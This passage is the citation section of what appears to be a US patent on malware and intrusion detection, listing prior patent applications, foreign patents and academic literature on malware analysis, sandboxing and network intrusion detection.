20100287260	Peterson et al.	Nov 2010	A1
20100299754	Amit et al.	Nov 2010	A1
20100306173	Frank	Dec 2010	A1
20110004737	Greenebaum	Jan 2011	A1
20110025504	Lyon et al.	Feb 2011	A1
20110041179	St Hlberg	Feb 2011	A1
20110047594	Mahaffey et al.	Feb 2011	A1
20110047620	Mahaffey et al.	Feb 2011	A1
20110055907	Narasimhan et al.	Mar 2011	A1
20110078794	Manni et al.	Mar 2011	A1
20110093951	Aziz	Apr 2011	A1
20110099620	Stavrou et al.	Apr 2011	A1
20110099633	Aziz	Apr 2011	A1
20110099635	Silberman et al.	Apr 2011	A1
20110113231	Kaminsky	May 2011	A1
20110145918	Jung et al.	Jun 2011	A1
20110145920	Mahaffey et al.	Jun 2011	A1
20110145934	Abramovici et al.	Jun 2011	A1
20110167493	Song et al.	Jul 2011	A1
20110167494	Bowen et al.	Jul 2011	A1
20110173213	Frazier et al.	Jul 2011	A1
20110173460	Ito et al.	Jul 2011	A1
20110219449	St. Neitzel et al.	Sep 2011	A1
20110219450	McDougal et al.	Sep 2011	A1
20110225624	Sawhney et al.	Sep 2011	A1
20110225655	Niemela et al.	Sep 2011	A1
20110247072	Staniford et al.	Oct 2011	A1
20110265182	Peinado et al.	Oct 2011	A1
20110289582	Kejriwal et al.	Nov 2011	A1
20110302587	Nishikawa et al.	Dec 2011	A1
20110307954	Melnik et al.	Dec 2011	A1
20110307955	Kaplan et al.	Dec 2011	A1
20110307956	Yermakov et al.	Dec 2011	A1
20110314546	Aziz et al.	Dec 2011	A1
20120023593	Puder et al.	Jan 2012	A1
20120054869	Yen et al.	Mar 2012	A1
20120066698	Yanoo	Mar 2012	A1
20120079596	Thomas et al.	Mar 2012	A1
20120084859	Radinsky et al.	Apr 2012	A1
20120096553	Srivastava et al.	Apr 2012	A1
20120110667	Zubrilin et al.	May 2012	A1
20120117652	Manni et al.	May 2012	A1
20120121154	Xue et al.	May 2012	A1
20120124426	Maybee et al.	May 2012	A1
20120174186	Aziz et al.	Jul 2012	A1
20120174196	Bhogavilli et al.	Jul 2012	A1
20120174218	McCoy et al.	Jul 2012	A1
20120198279	Schroeder	Aug 2012	A1
20120210423	Friedrichs et al.	Aug 2012	A1
20120222121	Staniford et al.	Aug 2012	A1
20120255015	Sahita et al.	Oct 2012	A1
20120255017	Sallam	Oct 2012	A1
20120260342	Dube et al.	Oct 2012	A1
20120266244	Green et al.	Oct 2012	A1
20120278886	Luna	Nov 2012	A1
20120297489	Dequevy	Nov 2012	A1
20120330801	McDougal et al.	Dec 2012	A1
20120331553	Aziz et al.	Dec 2012	A1
20130014259	Gribble et al.	Jan 2013	A1
20130036472	Aziz	Feb 2013	A1
20130047257	Aziz	Feb 2013	A1
20130074185	McDougal et al.	Mar 2013	A1
20130086684	Mohler	Apr 2013	A1
20130097699	Balupari et al.	Apr 2013	A1
20130097706	Titonis et al.	Apr 2013	A1
20130111587	Goel et al.	May 2013	A1
20130117852	Stute	May 2013	A1
20130117855	Kim et al.	May 2013	A1
20130139264	Brinkley et al.	May 2013	A1
20130160125	Likhachev et al.	Jun 2013	A1
20130160127	Jeong et al.	Jun 2013	A1
20130160130	Mendelev et al.	Jun 2013	A1
20130160131	Madou et al.	Jun 2013	A1
20130167236	Sick	Jun 2013	A1
20130174214	Duncan	Jul 2013	A1
20130185789	Hagiwara et al.	Jul 2013	A1
20130185795	Winn et al.	Jul 2013	A1
20130185798	Saunders et al.	Jul 2013	A1
20130191915	Antonakakis et al.	Jul 2013	A1
20130196649	Paddon et al.	Aug 2013	A1
20130227691	Aziz et al.	Aug 2013	A1
20130246370	Bartram et al.	Sep 2013	A1
20130247186	LeMasters	Sep 2013	A1
20130263260	Mahaffey et al.	Oct 2013	A1
20130291109	Staniford et al.	Oct 2013	A1
20130298243	Kumar et al.	Nov 2013	A1
20130318038	Shiffer et al.	Nov 2013	A1
20130318073	Shiffer et al.	Nov 2013	A1
20130325791	Shiffer et al.	Dec 2013	A1
20130325792	Shiffer et al.	Dec 2013	A1
20130325871	Shiffer et al.	Dec 2013	A1
20130325872	Shiffer et al.	Dec 2013	A1
20140032875	Butler	Jan 2014	A1
20140053260	Gupta et al.	Feb 2014	A1
20140053261	Gupta et al.	Feb 2014	A1
20140130158	Wang et al.	May 2014	A1
20140137180	Lukacs et al.	May 2014	A1
20140164352	Denninghoff	Jun 2014	A1
20140169762	Ryu	Jun 2014	A1
20140179360	Jackson et al.	Jun 2014	A1
20140181131	Ross	Jun 2014	A1
20140189687	Jung et al.	Jul 2014	A1
20140189866	Shiffer et al.	Jul 2014	A1
20140189882	Jung et al.	Jul 2014	A1
20140237600	Silberman et al.	Aug 2014	A1
20140280245	Wilson	Sep 2014	A1
20140283037	Sikorski et al.	Sep 2014	A1
20140283063	Thompson et al.	Sep 2014	A1
20140328204	Klotsche et al.	Nov 2014	A1
20140337836	Ismael	Nov 2014	A1
20140344926	Cunningham et al.	Nov 2014	A1
20140351935	Shao et al.	Nov 2014	A1
20140380473	Bu et al.	Dec 2014	A1
20140380474	Paithane et al.	Dec 2014	A1
20150007312	Pidathala et al.	Jan 2015	A1
20150096022	Vincent et al.	Apr 2015	A1
20150096023	Mesdaq et al.	Apr 2015	A1
20150096024	Haq et al.	Apr 2015	A1
20150096025	Ismael	Apr 2015	A1
20150180886	Staniford et al.	Jun 2015	A1
20150186645	Aziz et al.	Jul 2015	A1
20150199513	Ismael et al.	Jul 2015	A1
20150199531	Ismael et al.	Jul 2015	A1
20150199532	Ismael	Jul 2015	A1
20150220735	Paithane et al.	Aug 2015	A1
20150372980	Eyada	Dec 2015	A1
20160004869	Ismael et al.	Jan 2016	A1
20160006756	Ismael et al.	Jan 2016	A1
20160044000	Cunningham	Feb 2016	A1
20160094572	Tyagi	Mar 2016	A1
20160127393	Aziz et al.	May 2016	A1
20160191547	Zafar et al.	Jun 2016	A1
20160191550	Ismael et al.	Jun 2016	A1
20160261612	Mesdaq et al.	Sep 2016	A1
20160285914	Singh et al.	Sep 2016	A1
20160301703	Aziz	Oct 2016	A1
20160335110	Paithane et al.	Nov 2016	A1
20170083703	Abbasi et al.	Mar 2017	A1
20180013770	Ismael	Jan 2018	A1
20180048660	Paithane et al.	Feb 2018	A1
20180121316	Ismael et al.	May 2018	A1
20180288077	Siddiqui et al.	Oct 2018	A1

Foreign Referenced Citations (11)

Number	Date	Country
2439806	Jan 2008	GB
2490431	Oct 2012	GB
0206928	Jan 2002	WO
0223805	Mar 2002	WO
2007117636	Oct 2007	WO
2008041950	Apr 2008	WO
2011084431	Jul 2011	WO
2011112348	Sep 2011	WO
2012075336	Jun 2012	WO
2012145066	Oct 2012	WO
2013067505	May 2013	WO

Non-Patent Literature Citations (57)

Entry
Venezia, Paul , “NetDetector Captures Intrusions”, InfoWorld Issue 27, (“Venezia”), (Jul. 14, 2003).
Vladimir Getov: “Security as a Service in Smart Clouds—Opportunities and Concerns”, Computer Software and Applications Conference (COMPSAC), 2012 IEEE 36th Annual, IEEE, Jul. 16, 2012 (Jul. 16, 2012).
Wahid et al., Characterising the Evolution in Scanning Activity of Suspicious Hosts, Oct. 2009, Third International Conference on Network and System Security, pp. 344-350.
Whyte, et al., “DNS-Based Detection of Scanning Worms in an Enterprise Network”, Proceedings of the 12th Annual Network and Distributed System Security Symposium, (Feb. 2005), 15 pages.
Williamson, Matthew M., “Throttling Viruses: Restricting Propagation to Defeat Malicious Mobile Code”, ACSAC Conference, Las Vegas, NV, USA, (Dec. 2002), pp. 1-9.
Yuhei Kawakoya et al: “Memory behavior-based automatic malware unpacking in stealth debugging environment”, Malicious and Unwanted Software (Malware), 2010 5th International Conference on, IEEE, Piscataway, NJ, USA, Oct. 19, 2010, pp. 39-46, XP031833827, ISBN: 978-1-4244-9353-1.
Zhang et al., The Effects of Threading, Infection Time, and Multiple-Attacker Collaboration on Malware Propagation, Sep. 2009, IEEE 28th International Symposium on Reliable Distributed Systems, pp. 73-82.
“Mining Specification of Malicious Behavior”, Jha et al., UCSB, Sep. 2007, https://www.cs.ucsb.edu/~chris/research/doc/esec07_mining.pdf.
“Network Security: NetDetector—Network Intrusion Forensic System (NIFS) Whitepaper”, (“NetDetector Whitepaper”), (2003).
“When Virtual is Better Than Real”, IEEEXplore Digital Library, available at http://ieeexplore.ieee.org/xpl/articleDetails.jsp?reload=true&arnumber=990073, (Dec. 7, 2013).
Abdullah, et al., Visualizing Network Data for Intrusion Detection, 2005 IEEE Workshop on Information Assurance and Security, pp. 100-108.
Adetoye, Adedayo , et al., “Network Intrusion Detection & Response System”, (“Adetoye”), (Sep. 2003).
Apostolopoulos, George; Hassapis, Constantinos; “V-eM: A cluster of Virtual Machines for Robust, Detailed, and High-Performance Network Emulation”, 14th IEEE International Symposium on Modeling, Analysis, and Simulation of Computer and Telecommunication Systems, Sep. 11-14, 2006, pp. 117-126.
Aura, Tuomas, “Scanning electronic documents for personally identifiable information”, Proceedings of the 5th ACM workshop on Privacy in electronic society. ACM, 2006.
Baecher, “The Nepenthes Platform: An Efficient Approach to collect Malware”, Springer-Verlag Berlin Heidelberg, (2006), pp. 165-184.
Bayer, et al., “Dynamic Analysis of Malicious Code”, J Comput Virol, Springer-Verlag, France., (2006), pp. 67-77.
Boubalos, Chris , “extracting syslog data out of raw pcap dumps, seclists.org, Honeypots mailing list archives”, available at http://seclists.org/honeypots/2003/q2/319 (“Boubalos”), (Jun. 5, 2003).
Chaudet, C. , et al., “Optimal Positioning of Active and Passive Monitoring Devices”, International Conference on Emerging Networking Experiments and Technologies, Proceedings of the 2005 ACM Conference on Emerging Network Experiment and Technology, CoNEXT '05, Toulouse, France, (Oct. 2005), pp. 71-82.
Chen, P. M. and Noble, B. D., “When Virtual is Better Than Real”, Department of Electrical Engineering and Computer Science, University of Michigan (“Chen”) (2001).
Cisco “Intrusion Prevention for the Cisco ASA 5500-x Series” Data Sheet (2012).
Cohen, M.I. , “PyFlag—An advanced network forensic framework”, Digital investigation 5, Elsevier, (2008), pp. S112-S120.
Costa, M. , et al., “Vigilante: End-to-End Containment of Internet Worms”, SOSP '05, Association for Computing Machinery, Inc., Brighton U.K., (Oct. 23-26, 2005).
Didier Stevens, “Malicious PDF Documents Explained”, Security & Privacy, IEEE, IEEE Service Center, Los Alamitos, CA, US, vol. 9, No. 1, Jan. 1, 2011, pp. 80-82, XP011329453, ISSN: 1540-7993, DOI: 10.1109/MSP.2011.14.
Distler, “Malware Analysis: An Introduction”, SANS Institute InfoSec Reading Room, SANS Institute, (2007).
Dunlap, George W. , et al., “ReVirt: Enabling Intrusion Analysis through Virtual-Machine Logging and Replay”, Proceeding of the 5th Symposium on Operating Systems Design and Implementation, USENIX Association, (“Dunlap”), (Dec. 9, 2002).
FireEye Malware Analysis & Exchange Network, Malware Protection System, FireEye Inc., 2010.
FireEye Malware Analysis, Modern Malware Forensics, FireEye Inc., 2010.
FireEye v.6.0 Security Target, pp. 1-35, Version 1.1, FireEye Inc., May 2011.
Goel, et al., Reconstructing System State for Intrusion Analysis, Apr. 2008 SIGOPS Operating Systems Review, vol. 42 Issue 3, pp. 21-28.
Gregg Keizer: “Microsoft's HoneyMonkeys Show Patching Windows Works”, Aug. 8, 2005, XP055143386, Retrieved from the Internet: URL:http://www.informationweek.com/microsofts-honeymonkeys-show-patching-windows-works/d/d-id/1035069? [retrieved on Jun. 1, 2016].
Heng Yin et al, Panorama: Capturing System-Wide Information Flow for Malware Detection and Analysis, Research Showcase © CMU, Carnegie Mellon University, 2007.
Hiroshi Shinotsuka, Malware Authors Using New Techniques to Evade Automated Threat Analysis Systems, Oct. 26, 2012, http://www.symantec.com/connect/blogs/, pp. 1-4.
Idika et al., A-Survey-of-Malware-Detection-Techniques, Feb. 2, 2007, Department of Computer Science, Purdue University.
Isohara, Takamasa, Keisuke Takemori, and Ayumu Kubota. “Kernel-based behavior analysis for android malware detection.” Computational Intelligence and Security (CIS), 2011 Seventh International Conference on. IEEE, 2011.
Kaeo, Merike , “Designing Network Security”, (“Kaeo”), (Nov. 2003).
Kevin A Roundy et al: “Hybrid Analysis and Control of Malware”, Sep. 15, 2010, Recent Advances in Intrusion Detection, Springer Berlin Heidelberg, Berlin, Heidelberg, pp. 317-338, XP019150454 ISBN:978-3-642-15511-6.
Khaled Salah et al: “Using Cloud Computing to Implement a Security Overlay Network”, Security & Privacy, IEEE, IEEE Service Center, Los Alamitos, CA, US, vol. 11, No. 1, Jan. 1, 2013 (Jan. 1, 2013).
Kim, H. , et al., “Autograph: Toward Automated, Distributed Worm Signature Detection”, Proceedings of the 13th Usenix Security Symposium (Security 2004), San Diego, (Aug. 2004), pp. 271-286.
King, Samuel T., et al., “Operating System Support for Virtual Machines”, (“King”), (2003).
Kreibich, C. , et al., “Honeycomb-Creating Intrusion Detection Signatures Using Honeypots”, 2nd Workshop on Hot Topics in Networks (HotNets-II), Boston, USA, (2003).
Kristoff, J. , “Botnets, Detection and Mitigation: DNS-Based Techniques”, NU Security Day, (2005), 23 pages.
Lastline Labs, The Threat of Evasive Malware, Feb. 25, 2013, Lastline Labs, pp. 1-8.
Li et al., A VMM-Based System Call Interposition Framework for Program Monitoring, Dec. 2010, IEEE 16th International Conference on Parallel and Distributed Systems, pp. 706-711.
Lindorfer, Martina, Clemens Kolbitsch, and Paolo Milani Comparetti. “Detecting environment-sensitive malware.” Recent Advances in Intrusion Detection. Springer Berlin Heidelberg, 2011.
Marchette, David J., “Computer Intrusion Detection and Network Monitoring: A Statistical Viewpoint”, (“Marchette”), (2001).
Moore, D. , et al., “Internet Quarantine: Requirements for Containing Self-Propagating Code”, INFOCOM, vol. 3, (Mar. 30-Apr. 3, 2003), pp. 1901-1910.
Morales, Jose A., et al., “Analyzing and exploiting network behaviors of malware.”, Security and Privacy in Communication Networks. Springer Berlin Heidelberg, 2010. 20-34.
Mori, Detecting Unknown Computer Viruses, 2004, Springer-Verlag Berlin Heidelberg.
Natvig, Kurt , “SANDBOXII: Internet”, Virus Bulletin Conference, (“Natvig”), (Sep. 2002).
NetBIOS Working Group. Protocol Standard for a NetBIOS Service on a TCP/UDP transport: Concepts and Methods. STD 19, RFC 1001, Mar. 1987.
Newsome, J. , et al., “Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software”, In Proceedings of the 12th Annual Network and Distributed System Security, Symposium (NDSS '05), (Feb. 2005).
Nojiri, D. , et al., “Cooperation Response Strategies for Large Scale Attack Mitigation”, DARPA Information Survivability Conference and Exposition, vol. 1, (Apr. 22-24, 2003), pp. 293-302.
Oberheide et al., CloudAV: N-Version Antivirus in the Network Cloud, 17th USENIX Security Symposium USENIX Security '08 Jul. 28-Aug. 1, 2008 San Jose, CA.
Reiner Sailer, Enriquillo Valdez, Trent Jaeger, Ronald Perez, Leendert van Doorn, John Linwood Griffin, Stefan Berger, sHype: Secure Hypervisor Approach to Trusted Virtualized Systems (Feb. 2, 2005) (“Sailer”).
Silicon Defense, “Worm Containment in the Internal Network”, (Mar. 2003), pp. 1-25.
Singh, S. , et al., “Automated Worm Fingerprinting”, Proceedings of the ACM/USENIX Symposium on Operating System Design and Implementation, San Francisco, California, (Dec. 2004).
Thomas H. Ptacek, and Timothy N. Newsham , “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”, Secure Networks, (“Ptacek”), (Jan. 1998).

Provisional Applications (1)

	Number	Date	Country
	62650860	Mar 2018	US
